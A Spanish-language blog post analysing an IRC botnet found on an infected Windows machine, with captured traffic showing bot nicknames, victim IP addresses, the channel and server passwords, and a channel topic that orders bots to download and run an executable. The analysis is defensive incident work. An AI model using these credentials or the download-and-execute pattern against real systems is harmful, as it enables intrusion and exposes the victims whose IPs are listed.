Por motivos que no vienen a cuento, me encontré el otro día una máquina con un comportamiento no poco habitual pero sí algo sospechoso. Mantenía activa una conexión a un puerto curioso: 6567/TCP. Además no paraba de recibir datos desde esa conexión, así que me decidí a investigar.
Echándole un vistazo al tráfico encontrado vi que se trataba de una sesión IRC... Algo curiosa, como muestra un botón:
:[SI|ESP|00|P|48315]!XP-4508@E739FE49.33702750.F81114C2.IP QUIT :Broken pipe.
:[SI|ESP|00|MP|5597]!XP-2501@190.234.197.89 QUIT :Ping timeout.
:[SI|ESP|00|P|48364]!XP-1604@190.234.151.199 QUIT :Broken pipe.
:[SI|ESP|00|MP|4889]!XP-9956@190.42.201.38 JOIN :###J0rd4n-FUD###.
:[SI|ESP|00|P|95632]!XP-3988@190.81.172.124 QUIT :Broken pipe.
:[SI|PER|00|MP|2023]!XP-2923@190.40.161.71 JOIN :###J0rd4n-FUD###.
:[SI|ESP|00|MP|7718]!XP-9011@190.232.224.179 JOIN :###J0rd4n-FUD###.
:[SI|ESP|00|MP|5597]!XP-2501@190.234.197.89 QUIT :Ping timeout.
:[SI|ESP|00|P|48364]!XP-1604@190.234.151.199 QUIT :Broken pipe.
:[SI|ESP|00|MP|4889]!XP-9956@190.42.201.38 JOIN :###J0rd4n-FUD###.
:[SI|ESP|00|P|95632]!XP-3988@190.81.172.124 QUIT :Broken pipe.
:[SI|PER|00|MP|2023]!XP-2923@190.40.161.71 JOIN :###J0rd4n-FUD###.
:[SI|ESP|00|MP|7718]!XP-9011@190.232.224.179 JOIN :###J0rd4n-FUD###.
Múltiples entradas y salidas al canal de IRC ###J0rd4n-FUD### así como una nomenclatura que seguía algún patrón para los clientes. De los 5 campos que hay entre corchetes, se puede entender que el segundo hace referencia al país (aunque consultando a donde pertenecen las direcciones IP no parece ser así) y el tercero unos flags sin identificar. Después aparece un cierre de exclamación y un identificador para el S.O. de la víctima (vi mayoría XP, algún Vista y un Win2K3 perdido...)
Maté la conexión por curiosidad y el proceso fue el siguiente:
1) Máquina víctima se conecta a una dirección web y se descarga un archivo hosts limpio, supuestamente para evitar protecciones que algunos anti-malware aplican modificando dicho archivo.
2) Máquina víctima conecta de nuevo al mismo servidor IRC y vemos algunos comandos aún más interesantes:
PASS pr1v4d0onl1n3r.
NICK [SI|ESP|00|MP|4973].
USER XP-7490 * 0 :NOMBRE.(NOMBRE podría ser el nombre de usuario en la máquina infectada)
MODE [SI|ESP|00|MP|4973] -ix.
JOIN ###J0rd4n-FUD### c1rc0s0leil.
PRIVMSG ###J0rd4n-FUD### :[p2p]: File injected to peer2peer folders..
PRIVMSG ###J0rd4n-FUD### :WinRAR Injection Activated.
PRIVMSG ###J0rd4n-FUD### :[Dl]: File download: 76.2KB to: c:\WINDOWS\windxds.exe @ 76.2KB/sec..
PRIVMSG ###J0rd4n-FUD### :[Dl]: Created process: "c:\WINDOWS\windxds.exe", PID: <3720>.
PRIVMSG ###J0rd4n-FUD### :WinRAR Injection Activated.
PRIVMSG ###J0rd4n-FUD### :[Dl]: File download: 76.2KB to: c:\WINDOWS\windxds.exe @ 76.2KB/sec..
PRIVMSG ###J0rd4n-FUD### :[Dl]: Created process: "c:\WINDOWS\windxds.exe", PID: <3720>.
Recuperamos dos contraseñas que nos permiten entrar en el centro de control de la botnet (aunque como meros espectadores sin conocer comandos), además de descubrir el nombre del fichero y el nº de proceso que mantienen infectada la máquina.
En el canal de IRC encontramos colocado el siguiente topic:
19:35 -!- Topic for ###J0rd4n-FUD###: .p2p|.rar|.desfi http://xxxx.xxxx.com/hosts.exe c:\WINDOWS\windxds.exe 1
19:35 -!- Topic set by Botero [] [Wed Aug 19 18:45:35 2009]
La URL ha sido modificada por mi.
Las dos URLs citadas son diferentes máquinas, al parecer máquinas también víctimas en todo este turbio asunto.
Intenté buscar algo más de información (whois, dominios implicados, escaneos de puertos, ...) pero en principio no encontré nada especialmente relevante.
Dos apuntes en la misma línea pero aún más divertidos:
La gente de Cisco se encontró con algo similar y tuvo éxito al contactar con el botmaster: http://www.cisco.com/web/about/security/intelligence/bots.html
En S21Sec han mantenido una entrevista con el vampiro: http://blog.s21sec.com/2009/09/entrevista-con-el-vampiro.html
No hay comentarios:
Publicar un comentario